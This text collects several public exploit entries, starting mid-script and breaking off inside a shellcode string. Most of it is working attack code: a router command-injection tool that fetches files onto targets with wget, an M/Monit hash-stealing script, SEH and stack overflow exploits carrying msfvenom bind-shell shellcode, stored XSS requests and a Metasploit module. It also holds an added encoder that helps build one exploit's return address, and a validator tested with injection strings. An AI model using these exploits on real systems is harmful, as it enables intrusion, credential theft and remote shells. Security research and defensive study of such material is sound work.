        filename = url.rsplit('/', 1)[-1]
        if self.args.file is not None:
            print(f"[*] Attempting download of file '{filename}' from {url} ...")
            if self.exploit(f"wget {url} -O /tmp/{filename}"):
                print(f"[*] File saved on {self.args.target}'s /tmp/{filename}.")
                print(self.exploit(f"du -h /tmp/{filename}"))
                return True
            else:
                print(f"[!] Failed to download {filename} from {url}")
                return False

    def run(self):
        if self.args.command is not None:
            print(self.exploit(self.args.command))
            exit()
        if self.args.file is not None:
            self.download_file(self.args.file)
            exit()


if __name__ == "__main__":
    # Create the parser and add arguments
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", default="192.168.1.1", help="Vulnerable target")
    parser.add_argument("-u", "--username", dest="username", default="admin", help="Valid username to use")
    parser.add_argument("-p", "--password", dest="password", default="admin", help="Valid password to use")
    parser.add_argument("-c", "--command", dest="command", default=None, help="Command to execute")
    parser.add_argument("-D", "--download-file", dest="file", default=None, help="Download file on target's /tmp directory")
    args = parser.parse_args()

    # Run exploit
    X = Exploit(args)
    if len(sys.argv) > 1:
        print(f"[*] Exploiting {X.CVE} ...")
        X.run()
    else:
        parser.print_help(sys.stderr)
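The injection above exists because mon_diag_addr is pasted into an sh -c string. As an added example, not the router firmware, the following validates the diagnostic target the way the CGI should (an IP address or a hostname, nothing else) and builds the ping call as an argument vector so no shell ever parses it; shlex.quote is shown for the case where a shell string cannot be avoided. The argument layout mirrors the ping line quoted in the post.

```python
"""Validate the diagnostic target and keep it out of a shell.

Added example, not the router firmware. It models the ping call the post
shows being built with sh -c and the two fixes: accept only an IP address or
hostname, and hand the command to the OS as an argv list so no shell parses
it. shlex.quote is shown for the case where a shell string cannot be avoided.
"""
import ipaddress
import re
import shlex

# RFC 1123 style hostname: labels of 1-63 alphanumerics/hyphens, no leading/trailing hyphen.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def target_family(addr):
    """Return '-4' or '-6' for a valid address/hostname, None for anything else."""
    try:
        return "-6" if ipaddress.ip_address(addr).version == 6 else "-4"
    except ValueError:
        return "-4" if HOSTNAME.match(addr) else None


def is_valid_target(addr):
    return target_family(addr) is not None


def build_ping_argv(addr, count=1, size=4, timeout=1):
    """Argument vector for subprocess.run(argv) with shell=False: metacharacters in
    addr are just bytes of one argument and are never expanded."""
    family = target_family(addr)
    if family is None:
        raise ValueError(f"rejected diagnostic target: {addr!r}")
    return ["ping", family, "-c", str(int(count)), "-s", str(int(size)),
            "-W", str(int(timeout)), addr]


def quoted_shell_fragment(addr):
    """If the firmware must build a shell string, quoting makes $(...) a literal word."""
    return f"ping -4 -c 1 -s 4 -W 1 {shlex.quote(addr)}"


if __name__ == "__main__":
    for addr in ("8.8.8.8", "example.com", "2001:db8::1", "$(id;)", "8.8.8.8;reboot"):
        print(f"{addr!r}: valid={is_valid_target(addr)}  shell={quoted_shell_fragment(addr)}")
```

Validation is the primary control: the exploit's $(command;) never reaches the command builder. The argv form is the second layer, and it also removes the "bad address" channel the exploit uses to read output back.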
16. # Title: M/Monit 3.7.4 - Password Disclosure
# Author: Dolev Farhi
# Date: 2020-07-09
# Vendor Homepage: https://mmonit.com/
# Version : 3.7.4

import sys
import requests

url = 'http://your_ip_here:8080'
username = 'test'
password = 'test123'

sess = requests.Session()
sess.get(url)


def login():
    print('Attempting to login...')
    data = {
        'z_username': username,
        'z_password': password
    }
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    resp = sess.post(url + '/z_security_check', data=data, headers=headers)
    if resp.ok:
        print('Logged in successfully.')
    else:
        print('Could not login.')
        sys.exit(1)


def steal_hashes():
    # The user listing and per-user detail endpoints return the stored MD5 password hash.
    resp = sess.get(url + '/api/1/admin/users/list')
    if resp.ok:
        for i in resp.json():
            mmonit_user = i['uname']
            result = sess.get(url + '/api/1/admin/users/get?uname={}'.format(mmonit_user))
            mmonit_passw = result.json()['password']
            print('Stolen MD5 hash. User: {}, Hash: {}'.format(mmonit_user, mmonit_passw))


if __name__ == '__main__':
    login()
    steal_hashes()
17. # Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
# Date: November 18, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: http://www.internetdownloadmanager.com/
# Software Link: http://www.internetdownloadmanager.com/download.html
# Version: 6.38.12
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041

# Steps to reproduce crash:
# 1) Execute provided Perl code
# 2) Open IDMan_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Internet Download Manager 6.38
# 5) From the Menu bar -> Downloads -> Scheduler
# 6) Check the box for 'Open the following file when done:'
# 7) Paste the contents of IDMan_Crash.txt into the input field below
# 8) Click 'Apply' and observe the crash

#!/usr/bin/perl

$baddata = "\x41" x 1302;
$baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1
$baddata .= "\x43" x (5000 - length($baddata));

$file = "IDMan_Crash.txt";
open (FILE, '>IDMan_Crash.txt');
print FILE $baddata;
close (FILE);

print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
18. # Exploit Title: Nagios Log Server 2.1.7 - 'snapshot_name' Persistent Cross-Site Scripting
# Date: 31.08.2020
# Exploit Author: Emre ÖVÜNÇ
# Vendor Homepage: https://www.nagios.com/
# Software Link: https://www.nagios.com/products/nagios-log-server/
# Version: 2.1.7
# Tested on: Linux/ISO
# Link: https://github.com/EmreOvunc/Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

# Description
A stored cross-site scripting (XSS) vulnerability in Nagios Log Server 2.1.7 lets an
attacker perform malicious actions against users who open a maliciously crafted link or
third-party web page.

# PoC
To exploit the vulnerability, send a POST request to
'/nagioslogserver/configure/create_snapshot' with a manipulated 'snapshot_name'
parameter in the request body; the stored value is later rendered to users who open a
maliciously crafted link or third-party web page.

POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=[XSS_PAYLOAD]
19. # Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041

# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click 'OK' when prompted 'Do you want to create a new Mp3 library?'
# 7) Paste the contents of Zortam_Crash.txt into the 'Select Folder' field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80

#!/usr/bin/perl

$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268 - length($baddata)); # exact overwrite at 272

$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled

# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
$seh = "\x62\x59\x01\x10"; # seh overwrite

$nop = "\x90" x 12; # NOP sled

# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";

$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);

print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
20. # Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - 'id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage:
IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"

FileName         : dsmadmc.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : False
"""

# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
#                   ^_ESP

"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
import struct

# 4000 bytes
buff_max_length = 800
eip_offset = 68

"""
BAD CHARS:  \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS: asciiprint \x20-\x7e
MOD CHARS:  \x00 -> \x20

Comparison results (byte written to the file vs. byte found in memory):

file   : 80 81 82 83 84 85 86 87
memory : 3f 3f 2c 9f 2c 2e 2b d8

file   : 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97
memory : 5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d

file   : 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7
memory : 7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15

file   : a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7
memory : 22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa

file   : b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7
memory : 2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80

file   : c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7
memory : 45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78

file   : d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7
memory : 4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87

file   : e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7
memory : 8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6

file   : f8 f9 fa fb fc fd fe ff
memory : 6f 97 a3 96 81 79 5f 98
"""

# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"

buff = b""
buff += b"A" * eip_offset
# 0x02803d7b (jmp esp in dbghelp.dll): because of the character translation shown
# above, 0x80 must be written as 0xc7, so the file holds 0x02c73d7b
buff += struct.pack("<I", 0x02c73d7b)
buff += shellcode
buff += b"C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
with open("IBM_TSM_v.5.2.0.1_exploit.txt", "wb") as f:
    f.write(buff)
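The comparison table in the post explains why the exploit writes 0x02c73d7b to land 0x02803d7b in memory: the "id" field rewrites every byte above 0x7e before it reaches the stack. The following is an added example, not the author's code, that turns that table into a lookup and inverts it, so a wanted return address (or any other byte string) can be checked for reachability and translated into the bytes that must go into the file. The mapping rows are copied from the table above; the pass-through of 0x20-0x7e and the 0x00 to 0x20 rewrite are as the post states; everything else is constructed here.

```python
"""Invert the file-to-memory character translation documented in the post.

Added example, not the exploit author's code. The rows of _MEMORY_ROWS are
the comparison table from the post; bytes 0x20-0x7e pass through unchanged
and 0x00 is rewritten to 0x20, as the post states. Given that, the inverse
map says which file byte produces a wanted memory byte, or that none does.
"""
# file byte (row start + column index) -> memory byte, for 0x80..0xff
_MEMORY_ROWS = {
    0x80: "3f 3f 2c 9f 2c 2e 2b d8",
    0x88: "5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d",
    0x98: "7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15",
    0xa8: "22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa",
    0xb8: "2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80",
    0xc8: "45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78",
    0xd8: "4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87",
    0xe8: "8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6",
    0xf8: "6f 97 a3 96 81 79 5f 98",
}
BAD_CHARS = b"\x00\x08\x09\x0a\x0d\x1a\x1b\x7f"   # cannot be placed in the field at all


def file_to_memory():
    """Full 256-entry table: what each byte written to the file becomes in memory."""
    table = {b: b for b in range(0x80)}   # low bytes survive unchanged ...
    table[0x00] = 0x20                    # ... except NUL, which turns into a space
    for start, row in _MEMORY_ROWS.items():
        for i, h in enumerate(row.split()):
            table[start + i] = int(h, 16)
    return table


def memory_to_file():
    """Inverse table. Several file bytes can map to one memory byte (e.g. c0-c3 all
    give 0x41); the lowest usable file byte wins, which keeps printable bytes as-is."""
    inverse = {}
    for f, m in sorted(file_to_memory().items()):
        if f in BAD_CHARS:
            continue
        inverse.setdefault(m, f)
    return inverse


def encode(wanted):
    """Bytes to write to the file so that `wanted` appears in memory."""
    inverse = memory_to_file()
    out = bytearray()
    for b in wanted:
        if b not in inverse:
            raise ValueError(f"memory byte {b:#04x} is unreachable through the field")
        out.append(inverse[b])
    return bytes(out)


def encode_address(addr):
    """Little-endian 32-bit address, translated for the file."""
    return encode(addr.to_bytes(4, "little"))


if __name__ == "__main__":
    print(encode_address(0x02803d7b).hex())   # jmp esp in dbghelp.dll
    for candidate in (0x028039eb, 0x02852c21, 0x0289fbe3, 0x0289fd2f, 0x028823a9):
        try:
            print(f"{candidate:#010x} -> {encode_address(candidate).hex()}")
        except ValueError as e:
            print(f"{candidate:#010x} -> {e}")
```

The same encoder settles the choice of pointer: a jmp/call esp whose address contains an unreachable byte (for example 0x00) is ruled out before any debugging, and the alphanumeric shellcode from the post needs no translation at all because its bytes are all in the pass-through range.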
21. # Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29233

Stored Cross-site scripting (XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when
a malicious script is injected directly into a vulnerable web application. Reflected XSS
involves reflecting a malicious script off a web application onto a user's browser.

Attack vector:
An attacker can inject the XSS payload into the page description; each time a user
visits the website the XSS triggers, and the attacker can steal the cookie according to
the crafted payload.

Vulnerable Parameters: Page description.

Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.

POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925

fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
22. ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
        By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to
        convert it to an MP3 file in the application, a buffer is overwritten, which
        allows for running shellcode.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gionathan Reale', # Exploit-DB POC
          'ZwX'              # Metasploit Module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-9767' ],
          [ 'EDB', '45412' ],
          [ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Windows 7 x86 - Windows 7 x64',
            {
              'Ret' => 0x66e42121 # POP POP RET
            }
          ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x2f"
        },
      'Privileged'     => false,
      'DisclosureDate' => "Sep 09 2018",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
      ])
  end

  def exploit
    file_payload = payload.encoded

    msfsploit = make_fast_nops(4116)
    msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
    msfsploit << [target.ret].pack("V*")                                     # SEH
    msfsploit << file_payload
    msfsploit << make_fast_nops(4440)

    file_create(msfsploit)
  end
end
23. # Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en

# Steps to Produce the Local Buffer Overflow (SEH):
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open

#!/usr/bin/env python
#-*-coding: utf-8-*-

# msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
# Byte strings and a binary write so every shellcode byte reaches the file unchanged under Python 3
shellcode = (b"\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
             b"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
             b"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
             b"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
             b"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
             b"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
             b"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
             b"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
             b"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
             b"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
             b"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
             b"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
             b"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
             b"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
             b"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
             b"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
